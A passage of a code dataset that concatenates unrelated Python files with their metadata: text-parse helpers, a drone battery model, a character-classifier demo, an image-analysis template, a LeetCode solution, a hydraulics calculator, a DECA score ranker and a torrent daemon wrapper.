received_relates(cabocha_data, sentence_n):\n    sentences = cabocha_data.split("EOS\\n")\n    sentence = sentences[sentence_n - 1].split("\\n")\n    rr = []\n    lines = []\n    for i, line in enumerate(sentence):\n        if line.startswith("*"):\n            rr.append(line)\n            line = []\n            for sc in range(i + 1, len(sentence)):\n                if sentence[sc].startswith("*"):\n                    break\n                else:\n                    line.append(sentence[sc])\n            lines.append("\\n".join(line))\n        else:\n            continue\n\n    return lines, rr\n\n\ndef to_sentence(lines):\n    sentence = []\n    for line in lines:\n        line = line.split("\\n")\n        for l in line:\n            sentence.append(l)\n\n    return sentence\n","sub_path":"5/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"326908032","text":"#distance = 6000 # m\n#payload = 5 # kg\nV = 14.8 # nominal voltage of a 4-cell LiPo battery\nbattery_cr_dis = 0.80 # 80% usable discharge\nrate = 5 # charging price per kWh\nspeed = 7 # m/s\nframe_weight = 1 # kg\nTTWR = 1.5 # thrust to weight ratio\ng = 9.8 # m/s^2\n\n\ndef AmpRate(payload, distance):\n    battery_weight = 0.5 # kg\n    TOF = distance / speed # time of flight\n    Power = TTWR * (battery_weight + frame_weight + payload) * speed * g\n
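    # descriptive note on the formula below: Power[W] * TOF[s] gives joules; /3600 -> Wh, /V -> Ah, *1000 -> mAh; /battery_cr_dis sizes the pack so only 80% of its capacity is drawn\n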
    Amp_rating = (Power * TOF * 1000) / (V * battery_cr_dis * 3600) # mAh (1000/3600 factor)\n\n    max_iter = 100\n    start_iter = 0\n\n    while (start_iter < max_iter):\n        start_iter += 1\n        Power = TTWR * (battery_weight + frame_weight + payload) * speed * g\n        Amp_rating = (Power * TOF * 1000) / (V * battery_cr_dis * 3600) # mAh (1000/3600 factor)\n        battery_weight = 0.0005 * (Amp_rating**0.8182)\n\n    Total_Energy = (Power * TOF) / 3600000 # kWh\n    Total_cost = Total_Energy * rate # total charging cost of electricity\n    #print(Total_cost)\n    #print(battery_weight)\n    #print("local ", Amp_rating)\n    return Amp_rating\n\n\ndef BatWeight(Amp_rating):\n    battery_weight = 0.0005 * (Amp_rating**0.8182)\n    return battery_weight\n\ndef Cost(Amp_rating, weight, payload, distance):\n    Total_Energy = (Amp_rating * V) / (10**6) # kWh\n    Cost = 2 + 3 *(Total_Energy * rate)\n    return Cost\n\n\n\ndef main():\n    print("Nothing")\n\nif __name__ == '__main__':\n    main()","sub_path":"drone_model.py","file_name":"drone_model.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"357860335","text":"from PIL import Image\nimport numpy\nfrom data_visualization.render_character import render_with_pyplot\nfrom classifier_mlp.iteration_2_load_clf import mlp_classifier\nfrom classifier_rfc.iteration_2_load_clf import rfc_classifier\nfrom classifier_sgd.iteration_2_load_clf import sgd_classifier\nfrom data_management.adapters import to_character\nfrom sklearn.metrics import recall_score, precision_score\nfrom demo_adapters import as_28_by_28, as_grayscale_list, flatten\n\n\ndef adapt_for_prediction(img):\n    rgb_list = img.getdata()\n    grayscale_list = as_grayscale_list(rgb_list)\n    grayscale_28_by_28 = as_28_by_28(grayscale_list)\n    flattened_image = flatten(grayscale_28_by_28)\n    return flattened_image\n\ndef predict(img, actual):\n    flattened_image = adapt_for_prediction(img)\n\n    mlp_prediction = mlp_classifier.predict([flattened_image])\n    rfc_prediction = rfc_classifier.predict([flattened_image])\n    sgd_prediction = sgd_classifier.predict([flattened_image])\n    \n    print('actual = ', actual)\n    print('mlp_prediction = ', to_character(mlp_prediction))\n    print('rfc_prediction = ', to_character(rfc_prediction))\n    print('sgd_prediction = ', to_character(sgd_prediction), '\\n')\n\n\n\ncharacters_drawn_by_riley = list(map(\n    lambda ascii_number: (chr(ascii_number), chr(ascii_number - 32)), \n    range(97, 123) # 97..122 covers 'a'..'z'; range's end is exclusive\n))\n\npredictions = []\nfor (lowercase_chr, uppercase_chr) in characters_drawn_by_riley:\n    uppercase_img = Image.open(\n        '/Users/rileylittlefield/Desktop/classify_chars_ml/src/demo/riley-'\n        + uppercase_chr +\n        '-cap.png'\n    )\n\n    lowercase_img = Image.open(\n        '/Users/rileylittlefield/Desktop/classify_chars_ml/src/demo/riley-' \n        + lowercase_chr +\n        '.png'\n    )\n\n    predict(uppercase_img, uppercase_chr)\n    predict(lowercase_img, lowercase_chr)\n\nimages = []\nlabels = []\nfor (lowercase_chr, uppercase_chr) in characters_drawn_by_riley:\n    images.append(adapt_for_prediction(Image.open(\n        '/Users/rileylittlefield/Desktop/classify_chars_ml/src/demo/riley-'\n        + uppercase_chr +\n        '-cap.png'\n    )))\n    labels.append(ord(lowercase_chr) - 96)\n\n    images.append(adapt_for_prediction(Image.open(\n        '/Users/rileylittlefield/Desktop/classify_chars_ml/src/demo/riley-'\n        + lowercase_chr +\n        '.png'\n    )))\n    labels.append(ord(lowercase_chr) - 96)\n\ndef grade_performance(characters, labels, classifier, clf_name):\n    predictions = classifier.predict(characters)\n    precision = 
precision_score(\n labels,\n predictions,\n average='macro'\n )\n print(clf_name, 'precision = ', precision)\n\n recall = recall_score(\n labels,\n predictions,\n average='macro'\n )\n print(clf_name, 'recall = ', recall, '\\n')\n\n\ngrade_performance(images, labels, mlp_classifier, 'mlp_classifier')\n# mlp_classifier precision = 0.6933333333333332\n# mlp_classifier recall = 0.7\n\ngrade_performance(images, labels, rfc_classifier, 'rfc_classifier')\n# rfc_classifier precision = 0.63\n# rfc_classifier recall = 0.58\n\ngrade_performance(images, labels, sgd_classifier, 'sgd_classifier')\n# sgd_classifier precision = 0.43920634920634927\n# sgd_classifier recall = 0.42\n","sub_path":"src/demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"302406765","text":"\"\"\"{{ cookiecutter.project }} analysis.\"\"\"\n\nimport os\nimport logging\nimport argparse\nimport errno\n\nfrom dtoolcore import DataSet\n\nfrom jicbioimage.core.image import Image\nfrom jicbioimage.core.transform import transformation\nfrom jicbioimage.core.io import AutoName, AutoWrite\n\n__version__ = \"{{ cookiecutter.version }}\"\n\nAutoName.prefix_format = \"{:03d}_\"\n\n\ndef safe_mkdir(directory):\n \"\"\"Create directories if they do not exist.\"\"\"\n try:\n os.makedirs(directory)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(directory):\n pass\n else:\n raise\n\n\ndef item_output_path(output_directory, rel_path):\n \"\"\"Return item output path; and create it if it does not already exist.\"\"\"\n abs_path = os.path.join(output_directory, rel_path)\n safe_mkdir(abs_path)\n return abs_path\n\n\n@transformation\ndef identity(image):\n \"\"\"Return the image as is.\"\"\"\n return image\n\n\ndef analyse_file(fpath, output_directory):\n \"\"\"Analyse a single file.\"\"\"\n logging.info(\"Analysing file: {}\".format(fpath))\n\n AutoName.directory = output_directory\n\n image = Image.from_file(fpath)\n image = identity(image)\n\n\ndef analyse_dataset(dataset_dir, output_dir):\n \"\"\"Analyse all the files in the dataset.\"\"\"\n dataset = DataSet.from_path(dataset_dir)\n logging.info(\"Analysing items in dataset: {}\".format(dataset.name))\n\n for i in dataset.identifiers:\n data_item_abspath = dataset.abspath_from_identifier(i)\n item_info = dataset.item_from_identifier(i)\n\n specific_output_dir = item_output_path(output_dir, item_info[\"path\"])\n analyse_file(data_item_abspath, specific_output_dir)\n\n\ndef main():\n # Parse the command line arguments.\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"input_dataset\", help=\"Input dataset\")\n parser.add_argument(\"output_dir\", help=\"Output directory\")\n parser.add_argument(\"--debug\", default=False, action=\"store_true\",\n help=\"Write out intermediate images\")\n args = parser.parse_args()\n\n # Create the output directory if it does not exist.\n if not os.path.isdir(args.output_dir):\n os.mkdir(args.output_dir)\n AutoName.directory = args.output_dir\n\n # Only write out intermediate images in debug mode.\n if not args.debug:\n AutoWrite.on = False\n\n # Setup a logger for the script.\n log_fname = \"audit.log\"\n log_fpath = os.path.join(args.output_dir, log_fname)\n logging_level = logging.INFO\n if args.debug:\n logging_level = logging.DEBUG\n logging.basicConfig(filename=log_fpath, level=logging_level)\n\n # Log some basic information about the script that is running.\n 
logging.info(\"Script name: {}\".format(__file__))\n logging.info(\"Script version: {}\".format(__version__))\n\n # Run the analysis.\n if os.path.isdir(args.input_dataset):\n analyse_dataset(args.input_dataset, args.output_dir)\n else:\n parser.error(\"{} not a directory\".format(args.input_dataset))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"{{cookiecutter.project}}/scripts/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"221837466","text":"#!/usr/bin/python3.6\n#coding:utf-8\n\n\"\"\"\n@author: Robot Liu\n@contact: robotliu0327@gmail.com\n@software: PyCharm\n@file: 76.最小覆盖子串.py\n@time: 2020-08-20 上午 11:20\n\"\"\"\n'''\n给你一个字符串 S、一个字符串 T 。请你设计一种算法,可以在 O(n) 的时间复杂度内,从字符串 S 里面找出:包含 T 所有字符的最小子串。\n\n示例:\n\n输入:S = \"ADOBECODEBANC\", T = \"ABC\"\n输出:\"BANC\"\n\n\n提示:\n\n\n\t如果 S 中不存这样的子串,则返回空字符串 \"\"。\n\t如果 S 中存在这样的子串,我们保证它是唯一的答案。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/minimum-window-substring\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\nimport collections\nfrom collections import Counter\n\nclass Solution:\n def minWindow(self, s: str, t: str) -> str:\n need = Counter(t)\n window = collections.defaultdict(int)\n valid,L,R,ans = 0,0,0,(-1,len(s))\n while R m\n 1, # nope\n ]\n G_DMN = [\n M3H_TO_M3S,\n LS_TO_M3S,\n 1, # nope\n ]\n\n def convert(cls, x, x_dmn, atr=1.0):\n return x*x_dmn*atr\n\n\nclass PoringHydraulic:\n\n def __init__(self, k_r_src, nu_src, ro_src, d_src, g_src, ksi_src):\n self.w = 0.0\n self.k_r = k_r_src # m\n self.nu = nu_src\n self.ro = ro_src # kg/m3\n self.d = d_src # m\n self.g = g_src # m3/s\n self.re = 0.0\n self.lmd = 0.0\n self.ksi = ksi_src\n self.lidrop = 0.0 # Pa/m\n self.lodrop = 0.0 # Pa\n self.local_drop()\n\n def speed(self):\n try:\n self.w = 4*self.g / (3.1415*pow(self.d, 2))\n except ZeroDivisionError:\n self.w = 0\n return self.w\n\n def reynolds(self):\n if self.w == 0:\n self.w = self.speed()\n self.re = self.w*self.d/self.nu\n return self.re\n\n def _lambda(self):\n wtf = 0.0\n poring_base = 0.0\n lm = 0.0\n\n try:\n if self.re == 0:\n self.re = self.reynolds()\n wtf = 568*self.d/self.k_r\n if self.re < wtf and self.re > 2300:\n poring_base = (self.k_r/self.d + 68/self.re)\n lm = 0.11*pow(poring_base, 0.25)\n\n elif self.re < 2300:\n lm = 64/self.re\n else:\n lm = 0.11*pow(self.k_r/self.d, 0.25)\n\n except ZeroDivisionError:\n lm = 0.0\n\n self.lmd = lm\n return self.lmd\n\n def linear_drop(self):\n\n if self.w == 0:\n self.w = self.speed()\n if self.lmd == 0:\n self.lmd = self._lambda()\n try:\n self.lidrop = self.lmd * pow(self.w, 2) * self.ro / (2 * self.d)\n\n except ZeroDivisionError:\n self.lidrop = 0.0\n\n return self.lidrop\n\n def local_drop(self):\n\n if self.lidrop == 0:\n self.lidrop = self.linear_drop()\n if self.ksi == 0:\n self.lodrop = 0.0\n return 0.0\n else:\n try:\n l_eq = self.ksi * self.d / self.lmd\n self.lodrop = l_eq * self.lidrop\n except ZeroDivisionError:\n self.lodrop = 0.0\n return self.lodrop\n","sub_path":"prghydraulic.py","file_name":"prghydraulic.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"592975863","text":"'''\nCreator: Victor Sun\nDate: July 29, 2018\nProgram: Functions for DECA Ranker\nImported Files: os\n'''\nimport os\nfrom os.path import join\nsortby = {\"Overall Score\":1,\n \"Exam Score\":2,\n \"Oral 1 Score\":3,\n \"Oral 2 Score\":4}\n\ndef 
getFinalScore(event, chapter, name, name2=\"\"):\n events = {\"Apparel and Accessories Marketing Series\":\"AAM\",\n \"Accounting Applications Series\":\"ACT\",\n \"Automotive Services Marketing Series\":\"ASM\",\n \"Business Finance Series\":\"BFS\",\n \"Business Growth Plan\":\"EBG\",\n \"Business Law and Ethics Team Decision Making\":\"BLTDM\",\n \"Business Service Marketing Series\":\"BSM\",\n \"Business Services Operations Research\":\"BOR\",\n \"Buying and Merchandising Operations Research\":\"BMOR\",\n \"Buying and Merchandising Team Decision Making\":\"BTDM\",\n \"Creative Marketing Project\":\"CMP\",\n \"Community Service Project\":\"CSP\",\n \"Entrepreneurship Promotion Project\":\"EOOPP\",\n \"Entrepreneurship Series\":\"ENT\",\n \"Entrepreneurship Team Decision Making\":\"ETDM\",\n \"Fashion Merchandising Promotion Plan\":\"FMP\",\n \"Finance Operations Research\":\"FOR\",\n \"Financial Consulting\":\"FCE\",\n \"Financial Literacy Promotion Project\":\"FLPP\",\n \"Financial Services Team Decision Making\":\"FTDM\",\n \"Food Marketing Series\":\"FMS\",\n \"Franchise Business Plan\":\"EFB\",\n \"Hospitality Services Team Decision Making\":\"HTDM\",\n \"Hospitality and Tourism Operations Research\":\"HTOR\",\n \"Hospitality and Tourism Professional Selling\":\"HTPS\",\n \"Hotel and Lodging Management Series\":\"HLM\",\n \"Human Resources Management Series\":\"HRM\",\n \"Independent Business Plan\":\"EIB\",\n \"Innovation Plan\":\"EIP\",\n \"International Business Plan\":\"IBP\",\n \"Learn and Earn Project\":\"LEP\",\n \"Marketing Communications Series\":\"MCS\",\n \"Marketing Management Team Decision Making\":\"MTDM\",\n \"Personal Financial Literacy\":\"PFL\",\n \"Principles of Business Management and Administration\":\"PBM\",\n \"Principles of Finance\":\"PFN\",\n \"Principles of Marketing\":\"PMK\",\n \"Professional Selling\":\"PSE\",\n \"Public Relations Project\":\"PRP\",\n \"Principles of Hospitality and Tourism\":\"PHT\",\n \"Quick Serve Restaurant Management Series\":\"\",\n \"Restaurant and Food Service Management Series\":\"RFSM\",\n \"Retail Merchandising Series\":\"RMS\",\n \"Sports and Entertainment Marketing Operations Research\":\"SEOR\",\n \"Sports and Entertainment Marketing Series\":\"SEM\",\n \"Sports and Entertainment Marketing Team Decision Making\":\"STDM\",\n \"Sports and Entertainment Promotion Plan\":\"SEPP\",\n \"Start-up Business Plan\":\"ESB\",\n \"Stock Market Game\":\"\",\n \"Travel and Tourism Team Decision Making\":\"TTDM\",\n \"Virtual Business Challenge Accounting\":\"\",\n \"Virtual Business Challenge Fashion\":\"\",\n \"Virtual Business Challenge Hotel Management\":\"\",\n \"Virtual Business Challenge Personal Finance\":\"\",\n \"Virtual Business Challenge Restaurant\":\"\",\n \"Virtual Business Challenge Retail\":\"\",\n \"Virtual Business Challenge Sports\":\"\"}\n for root, folders, files in os.walk(join(os.getcwd(), \"data/transcripts\")):\n if chapter[:10] in root or chapter[10:] in root:\n n2 = 0\n if name2 != \"\":\n for f in files:\n if name2 in f and \"txt\" in f:\n fIn = open(join(\"data/transcripts\",root.split(\"/\")[-1], f), encoding=\"latin-1\")\n for line in fIn:\n try:\n n2 = int(line.strip())\n break\n except:\n pass\n break\n for f in files:\n if name in f and \"txt\" in f:\n ar = []\n fScores = 0\n arFilled = False\n eventCorrect = False\n fIn = open(join(\"data/transcripts\",root.split(\"/\")[-1], f), encoding=\"latin-1\")\n prevLine = \"\"\n for line in fIn:\n if line[:5] == \"Final\":\n fScores += 1\n try:\n n = 
int(line.strip())\n if not arFilled:\n if n == sum(ar[:len(ar)-fScores]) and len(ar) != 1:\n arFilled = True\n else:\n ar.append(n)\n except(ValueError):\n try:\n if event == \"PBM\" and line.strip() == \"Principles of Business\":\n eventCorrect = True\n break\n if event == \"STDM\" and line.strip() == \"Sports and Entertainment\":\n eventCorrect = True\n break\n elif events[prevLine+\" \"+line.strip()] == event:\n eventCorrect = True\n break\n else:\n prevLine = line.strip()\n except(KeyError):\n try:\n if events[line.strip()] == event:\n eventCorrect = True\n break\n else:\n prevLine = line.strip()\n except(KeyError):\n prevLine = line.strip()\n pass\n if eventCorrect:\n for i in range(fScores):\n ar[len(ar)-i-1] = \"F\"+str(ar[len(ar)-i-1])\n if n2:\n ar[0] = (ar[0] + n2)/2.0\n return \"\\t\"+\"\\t\".join(map(str,ar))\n else:\n return \"\"\n return \"\"\n \nclass Competitor:\n def __init__(self, myID, myEvent, myTeam, myChapter, examScore, oral1Score, oral2Score, myPenalties, overallScore, myChapterID, sortBy):\n self.sort = sortBy\n self.id = myID\n self.event = myEvent\n self.team = myTeam\n self.chapter = myChapter\n self.exam = examScore\n self.oral1 = oral1Score\n self.oral2 = oral2Score\n self.penalties = myPenalties\n self.overall = overallScore\n self.chapterID = myChapterID\n def __str__(self):\n return self.id+\"\\t\"+self.overall\n def __lt__(self, other):\n if self.sort == \"Overall Score\":\n return self.overall < other.getAttr(1)\n elif self.sort == \"Exam Score\":\n return self.overall < other.getAttr(2)\n elif self.sort == \"Oral 1 Score\":\n return self.overall < other.getAttr(3)\n elif self.sort == \"Oral 2 Score\":\n return self.overall < other.getAttr(4)\n def getAttr(self, attrNum):\n if attrNum == 1:\n return self.overall\n elif attrNum == 2:\n return self.exam\n elif attrNum == 3:\n return self.oral1\n elif attrNum == 4:\n return self.oral2\n\nclass Person:\n def __init__(self, myID, firstName, lastName, regional):\n self.id = myID\n self.first = firstName\n self.last = lastName\n self.region = regional\n def __str__(self):\n return self.id+\"\\t\"+self.first+\" \"+self.last\n def getName(self):\n return self.first+\" \"+self.last\n\ndef getAllPeople():\n fIn = open(\"data/Timetables.csv\", \"r\", encoding=\"latin-1\")\n fIn.readline()\n allPeople = {}\n try:\n for line in fIn:\n line = line.strip().split(\",\")\n allPeople[int(line[13])] = Person(line[13], line[17], line[18], line[32])\n except(UnicodeDecodeError):\n print(fIn.readline())\n print(fIn.readline())\n fIn.close()\n return allPeople\n\ndef getAllScores(event, sortBy):\n fIn = open(\"data/scores.txt\", \"r\", encoding=\"latin-1\")\n eventScores = []\n for line in fIn:\n line = line.strip().split(\" \")\n if line[0].isdigit():\n if int(line[0]) >= 10000:\n count = 2\n for i in range(3, len(line)):\n if line[i].isdigit():\n count = i\n break\n if len(line[count:]) == 6:\n if line[2].isdigit():\n score = Competitor(line[0], line[1], line[2], \" \".join(line[3:count]), line[count], line[count+1], line[count+2], line[count+3], line[count+4], line[count+5], sortBy)\n if score.event == event:\n eventScores.append(score)\n else:\n score = Competitor(line[0], line[1], -1, \" \".join(line[2:count]), line[count], line[count+1], line[count+2], line[count+3], line[count+4], line[count+5], sortBy)\n if score.event == event:\n eventScores.append(score)\n fIn.close()\n return eventScores\n\ndef getAllFinalists():\n fIn = open(\"data/transcriptsLabeled.txt\")\n finalists = {}\n for line in fIn:\n l = 
line.strip().split(\"\\t\", 1)\n finalists[l[0]] = l[1].split(\"\\t\")\n fIn.close()\n return finalists\n\ndef getFinalHeadings(event):\n if event[-3:]==\"TDM\":\n return \"\\tFExam\\tFPCase\\tFFCase\"\n else:\n if event[0] == \"P\":\n return \"\\tFExam\\tFPCase\\tFFCase\"\n else:\n return \"\\tFExam\\tFPCase1\\tFPCase2\\tFFCase\"\n\ndef Rank(event, sort, id=\"\", justOne=False, schoolAr=[]):\n fOut = open(\"output.txt\", \"w\")\n fOut2 = open(\"output.tsv\", \"w\")\n teams = [\"BLTDM\", \"FTDM\", \"HTDM\", \"TTDM\", \"BTDM\", \"MTDM\", \"STDM\", \"ETDM\"]\n\n allPeople = getAllPeople()\n eventScores = getAllScores(event, sort)\n finalists = getAllFinalists()\n if event in teams:\n teams = []\n for myTeam in eventScores:\n if int(myTeam.id)>= 20000:\n teamNum = myTeam.team\n teamID = myTeam.id\n teamChapter = myTeam.chapter\n team = []\n team.append(myTeam)\n for score in eventScores:\n if score.team == teamNum and score.id != teamID and score.chapter == teamChapter:\n team.append(score)\n teams.append(team)\n teams.sort(key=lambda score:int(score[0].getAttr(sortby[sort])), reverse = True) #SORT\n finalsHeading = getFinalHeadings(event)\n fOut.write(\"Event: \"+event+\"\\nRank\\tSchool\\t\\t\\t\\t\\tID\\tName\\t\\t\\tID\\tName\\t\\t\\tScore\\tRegion\\t\"+finalsHeading+\"\\n\")\n fOut2.write(\"Event\\tRank\\tSchool\\tID\\tName\\tID\\tName\\tScore\\tRegion\\t\"+finalsHeading+\"\\n\")\n for i in range(len(teams)):\n team = teams[i]\n try:\n title=\"\"\n scorePerson1 = allPeople[int(team[1].id)]\n try:\n scorePerson2 = allPeople[int(team[2].id)]\n except(IndexError):\n scorePerson2 = scorePerson1\n if justOne:\n if scorePerson1.id == id or scorePerson2.id == id or scorePerson1.getName() == id or scorePerson2.getName() == id:\n team.append(scorePerson1)\n team.append(scorePerson2)\n team.append(event)\n team.append(getFinalScore(event, team[1].chapter, scorePerson1.getName(), scorePerson2.getName()))\n schoolAr.append((i+1,team))\n break\n else:\n finalScores = getFinalScore(event, team[1].chapter, scorePerson1.getName(), scorePerson2.getName())\n if id != \"\":\n if scorePerson1.id == id or scorePerson2.id == id or scorePerson1.getName() == id or scorePerson2.getName() == id:\n title = \"Here\"\n fOut.write(str(i+1)+title+\"\\t\"+team[0].chapter.ljust(35, \" \")+\"\\t\"+str(scorePerson1).ljust(25, \" \")+\"\\t\"+str(scorePerson2).ljust(25, \" \")+\"\\t\"+team[0].overall+\"\\t\"+scorePerson1.region.ljust(12, \" \")+finalScores+\"\\n\")\n fOut2.write(event+\"\\t\"+str(i+1)+\"\\t\"+team[0].chapter+\"\\t\"+str(scorePerson1)+\"\\t\"+str(scorePerson2)+\"\\t\"+team[0].overall+\"\\t\"+scorePerson1.region+finalScores+\"\\n\")\n except (KeyError):\n print(\"KeyError: \"+team[1].id+\" \"+team[2].id)\n else:\n eventScores = sorted(eventScores, key=lambda score:int(score.getAttr(sortby[sort])), reverse=True) #SORT\n finalsHeading = getFinalHeadings(event)\n fOut.write(\"Event: \"+event+\"\\nRank\\tSchool\\t\\t\\t\\t\\tID\\tName\\t\\t\\tScore\\tOral1\\tOral2\\tExam\\tRegion\\t\"+finalsHeading+\"\\n\")\n fOut2.write(\"Event\\tRank\\tSchool\\tID\\tName\\tScore\\tOral1\\tOral2\\tExam\\tRegion\"+finalsHeading+\"\\n\")\n for i in range(len(eventScores)):\n try:\n score = eventScores[i]\n scorePerson = allPeople[int(score.id)]\n title = \"\"\n if justOne:\n if score.id == id or scorePerson.getName() == id:\n schoolAr.append((i+1,[score, scorePerson, getFinalScore(event, score.chapter, scorePerson.getName())]))\n break\n else:\n finalScores = getFinalScore(event, score.chapter, scorePerson.getName())\n 
title=\"\"\n if id != \"\":\n if score.id == id or scorePerson.getName() == id:\n title = \"Here\"\n fOut.write(str(i+1)+title+\"\\t\"+score.chapter.ljust(35, \" \")+\"\\t\"+str(scorePerson).ljust(25, \" \")+\"\\t\"+score.overall+\"\\t\"+score.oral1+\"\\t\"+score.oral2+\"\\t\"+score.exam+\"\\t\"+scorePerson.region.ljust(12, \" \")+finalScores+\"\\n\")\n fOut2.write(event+\"\\t\"+str(i+1)+\"\\t\"+score.chapter+\"\\t\"+str(scorePerson)+\"\\t\"+score.overall+\"\\t\"+score.oral1+\"\\t\"+score.oral2+\"\\t\"+score.exam+\"\\t\"+scorePerson.region+finalScores+\"\\n\")\n except (KeyError):\n print(\"KeyError: \"+score.id)\n fOut.close()\n fOut2.close()\n\ndef Find(personID, sortby):\n fIn2 = open(\"data/Timetables.csv\", \"r\", encoding=\"latin-1\")\n fIn2.readline()\n for line in fIn2:\n line = line.strip().split(\",\")\n if line[13] == personID or line[17]+\" \"+line[18] == personID:\n event = line[20]\n break\n try:\n Rank(event, sortby, personID)\n except(UnboundLocalError):\n print(\"Cannot find \"+personID)\n\ndef AllFrom(school, sortby):\n fInAll = open(\"data/Timetables.csv\", \"r\", encoding=\"latin-1\")\n fInAll.readline()\n flag = False\n fOut = open(\"output.txt\", \"w\")\n fOut2 = open(\"output.tsv\", \"w\")\n schoolList = []\n for line in fInAll:\n line = line.strip().split(\",\")\n if line[22] == school:\n event = line[20]\n personID = line[13]\n if event != \"LDA\" and int(personID) >= 10000:\n try:\n print(\"Getting: \"+personID)\n Rank(event, sortby, personID, True, schoolList)\n except(UnboundLocalError):\n print(\"Cannot find \"+personID)\n schoolList.sort()\n num = len(school)/8+1\n fOut.write(\"Individual Series Events:\\nEvent\\tRank\\tID\\tName\\t\\t\\tScore\\tOral1\\tOral2\\tExam\\tRegion\\t\\tInternationals (Exam, Orals, Finals)\\n\")\n fOut2.write(\"Event\\tRank\\tID\\tName\\tScore\\tOral1\\tOral2\\tExam\\tRegion\\tInternational Scores\\n\")\n for i in schoolList:\n if len(i[1]) == 3:\n rank = i[0]\n score = i[1][0]\n scorePerson = i[1][1]\n fOut.write(score.event+\"\\t\"+str(rank)+\"\\t\"+str(scorePerson).ljust(25, \" \")+\"\\t\"+score.overall+\"\\t\"+score.oral1+\"\\t\"+score.oral2+\"\\t\"+score.exam+\"\\t\"+scorePerson.region.ljust(12, \" \")+i[1][2]+\"\\n\")\n fOut2.write(score.event+\"\\t\"+str(rank)+\"\\t\"+str(scorePerson).ljust(25, \" \")+\"\\t\"+score.overall+\"\\t\"+score.oral1+\"\\t\"+score.oral2+\"\\t\"+score.exam+\"\\t\"+scorePerson.region+i[1][2]+\"\\n\")\n \n num = len(school)/8+1\n fOut.write(\"\\nTeam Series Events:\\nEvent\\tRank\\tID\\tName\\t\\t\\tID\\tName\\t\\t\\tScore\\tRegion\\t\\tInternationals (Exam, Orals, Finals)\\n\")\n fOut2.write(\"Event\\tRank\\tSchool\\tID\\tName\\tID\\tName\\tScore\\tRegion\\tInternational Scores\\n\")\n for i in range(0,len(schoolList),2):\n if len(schoolList[i][1]) == 7:\n rank = schoolList[i][0]\n team = schoolList[i][1]\n scorePerson1 = team[3]\n scorePerson2 = team[4]\n event = team[5]\n fOut.write(event+\"\\t\"+str(rank)+\"\\t\"+str(scorePerson1).ljust(25, \" \")+\"\\t\"+str(scorePerson2).ljust(25, \" \")+\"\\t\"+team[0].overall+\"\\t\"+scorePerson1.region.ljust(12, \" \")+team[6]+\"\\n\")\n fOut2.write(event+\"\\t\"+str(rank)+\"\\t\"+str(scorePerson1)+\"\\t\"+str(scorePerson2)+\"\\t\"+team[0].overall+\"\\t\"+scorePerson1.region+team[6]+\"\\n\")\n fOut.close()\n fOut2.close()\n fInAll.close()\n","sub_path":"rankerFunctions.py","file_name":"rankerFunctions.py","file_ext":"py","file_size_in_byte":17704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"200755604","text":"from multiprocessing import Process\nfrom functools import partial\nfrom utils import *\nimport asyncio\nimport config\nimport os\nimport json\nimport re\nimport secrets\nimport string\nimport uuid\n\n\n# call run_daemon create necessary objects and configs\ndef start_server():\n p = Process(target=run_daemon)\n p.start()\n\n keys_path = os.path.join(os.getcwd(), \"hash_keys.json\")\n\n if os.path.exists(keys_path):\n with open(keys_path) as keys_file:\n return (p, json.load(keys_file))\n else:\n return (p, {})\n\n\n# supposed to exit from server\n# stop long-running process\ndef destroy_server(p, f_names):\n try:\n p.terminate()\n except:\n print(\"Process already exited.\")\n\n keys_path = os.path.join(\n os.getcwd(),\n \"hash_keys.json\")\n\n if f_names:\n if os.path.exists(keys_path):\n os.remove(keys_path)\n \n with open(keys_path, \"w+\") as keys_file:\n json.dump(f_names, keys_file)\n \n\n# acquire .torrent file\n# call handler for add\n# return unique key of torrent to client\ndef add(f_names, paths):\n\ttry:\n\t\ttorrent_paths = []\n\t\tfor path in paths:\n\t\t\ttorrent_path = \"{}/{}\".format(config.TORRENT_CACHE, path)\n\t\t\ttorrent_paths.append(torrent_path)\n\n\t\trun_async(partial(add_torrent, torrent_paths, config.DOWNLOAD_DIR))\n\t\t\n\texcept Exception as e:\n\t\tprint(\"Exception occurred in add: {}\".format(e))\n\t\treturn e\n\n\ttorrent_ids = []\n\tfor path in paths:\n\t\ttorrent_id = secrets.choice(range(1000, 10000))\n\t\ttorrent_id = str(format(torrent_id, \"04\"))\n\t\twhile torrent_id in f_names:\n\t\t\ttorrent_id = secrets.choice(range(1000, 10000))\n\t\t\ttorrent_id = str(format(torrent_id, \"04\"))\n\t\t\ttorrent_ids.append(torrent_id)\n\t\tf_names[torrent_id] = path\n\treturn torrent_ids\n\n\ndef remove(f_names, hash_keys):\n\tprint(hash_keys)\n\tpaths = list(map(\n\t\tlambda hash_key: f_names.pop(hash_key), hash_keys))\n\tprint(paths)\n\t# import pdb; pdb.set_trace()\n\tif paths:\n\t\ttry:\n\t\t\ttorrent_paths = []\n\t\t\tfor path in paths:\n\t\t\t\ttorrent_path = \"{}/{}\".format(config.TORRENT_CACHE, path)\n\t\t\t\ttorrent_paths.append(torrent_path)\n\t\t\trun_async(partial(remove_torrent, paths, config.DOWNLOAD_DIR))\n\t\texcept Exception as e:\n\t\t\tprint(\"Exception occurred: {}\".format(e))\n\t\t\treturn e\n\t\treturn list(paths)\n\telse:\n\t\treturn FileNotFoundError(\"Hash key must be invalid\")\n\n\n# pause a download specified by a specific key\ndef pause(f_names, hash_keys):\n\tprint(hash_keys)\n\tpaths = list(map(\n\t\tlambda hash_key: f_names.get(hash_key), 